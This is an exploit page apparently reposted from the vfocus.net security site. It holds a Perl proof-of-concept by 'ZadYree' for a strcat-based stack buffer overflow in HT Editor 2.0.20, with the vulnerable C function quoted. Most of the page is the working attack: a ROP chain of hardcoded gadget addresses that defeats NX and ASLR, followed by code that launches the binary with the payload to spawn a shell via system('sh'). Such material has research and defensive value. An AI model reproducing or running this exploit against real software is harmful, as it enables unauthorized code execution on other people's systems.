首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HT Editor 2.0.20 Buffer Overflow (ROP PoC)
来源:vfocus.net 作者:ZadYree 发布时间:2012-11-14  

#!/usr/bin/perl
=head1 TITLE

HT Editor 2.0.20 Buffer Overflow (ROP PoC)

=head2 DESCRIPTION

Since version 2.0.18, the stack overflow vulnerability has not been corrected, which I assume would make it 0day?
I consequently recoded an exploit, as memory addresses have changed. I chose to
make it B<bypass NX & ASLR>, SSP not being implemented.
To be honnest, it may be the only interest, as the binary is not SUID.

Remove =begin ...  annotation (at the end) to just print the command line.

=head2 USAGE

perl poc.pl /hte/path

 

=head3 Code

 int sys_common_canonicalize(char *result, const char *filename, const char *cwd, is_path_delim delim)
 {
  char *o = result;
  if (!sys_path_is_absolute(filename, delim)) {
   if (cwd) strcpy(o, cwd); else return EINVAL; // Our buffer size depends on path length.
   int ol = strlen(o);
   if (ol && !delim(o[ol-1])) {
    o[ol] = '/';
    o[ol+1] = 0;
   }
  } else *o = 0;
  strcat(o, filename); //<-- And here it is, good old unsecure function
  int k = flatten_path(o, delim);
  return (k == 0) ? 0 : EINVAL;
 }

=head3 AUTHORS

 * ZadYree
 * 3LRVS crew

=head3 Note

The path variable (o) is also vulnerable through a strcpy() unsecure call.
Hope developpers will mind correcting both 2.


Voice on T.V.: Is today's hectic lifestyle making you tense and impatient?
Bender: Shut up and get to the point!
=cut

use 5.010;
use Cwd;

my $bin = shift;
die "[-] Bad filename.\n" unless (-e $bin);

# Let's now dive into
my $pool = [
   ## Fry: This snow is beautiful. I'm glad global warming never happened.    ##
   ## Leela: Actually, it did. But thank God nuclear winter canceled it out.  ##
    pack('V', 0x80b395e),   # pop %esi; ret;
    pack('V', 0x81bd518),   # endwin@GOT
    pack('V', 0x80b5903),   # mov %esi, %eax; pop pop pop ret;
    pack('V', 0xb00b4dad) x 3,  # JUNK
    pack('V', 0x813527b),   # mov (%eax), %eax; add $0x1c, %esp; ret;
    pack('V', 0xabadf00d) x 7,  # JUNK
    pack('V', 0x813589b),   # call *%eax;
    
   ##  Amy, technology isn't intrinsecly good or evil, it's how it's used, like the Death Ray. ##
    pack('V', 0x80b395e),   # pop %esi; ret;
    pack('V', 0x81bd3fc),   # __cxa_atexit@GOT - 4 // base address whose pointer will help locating system().
    pack('V', 0x80b5903),   # mov %esi, %eax; pop pop pop ret;
    pack('V', 0xdeadbeef) x 3,  # JUNK
    pack('V', 0x80c21e6),   # add %eax, $0x4; ret; // Beat my 8 bit metal ass.
    pack('V', 0x813527b),   # mov (%eax), %eax; add $0x1c, %esp; ret; // In the game of chess, you can never let your adversary see your pieces.
    pack('V', 0xdeafface) x 7,  # JUNK
    pack('V', 0x80b395e),   # pop %esi; ret;
    pack('V', 0x292ceaab),   # A number to get the right
    pack('V', 0x80512a6),   # add %esi, %eax; pop pop pop ret;
    pack('V', 0xc0b4beef) x 3,  # JUNK
    pack('V', 0x80d4612),   # sub eax, 0x292c4e8b ; ret; // I'm not sure. I'm afraid we need to use... MATH.
    pack('V', 0x813589b),   # call *%eax;
    pack('V', 0x804aa10),   # exit@plt
    pack('V', 0x816928f),   # 'sh' string
];

=begin printPayload
my $buff = '"A"x' . (4107 - length(getcwd));

my $rop = join("", map {$_ = '\x' . unpack('H*', $_)} split(//, join("", @$pool)));

my $payload = qq{`perl -e 'print $buff . "$rop";'`};

say $bin . ' ' . $payload;
__END__
=end printPayload
=cut

say "[*] Executing system('sh')";

my $buff = ("A" x (4107 - length(getcwd)));
my $rop = join("", @$pool);
system($bin, $buff . $rop);
say "[+] Got Shell!";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Jira Scriptrunner 2.0.7 <= CSR
·Zoner Photo Studio v15 b3 Buff
·Invision IP.Board 3.3.4 unseri
·Huawei Quidway / Huawei CX600
·Novell Groupwise Internet Agen
·Java Applet JAX-WS Remote Code
·Novell NetIQ Privileged User M
·Smadav Anti Virus 9.1 Crash Po
·Novell NetIQ Privileged User M
·Zoner Photo Studio v15 Build 3
·Oracle Database Client System
·Apache downloader patch auto E
  推荐广告
CopyRight © 2002-2021 VFocuS.Net All Rights Reserved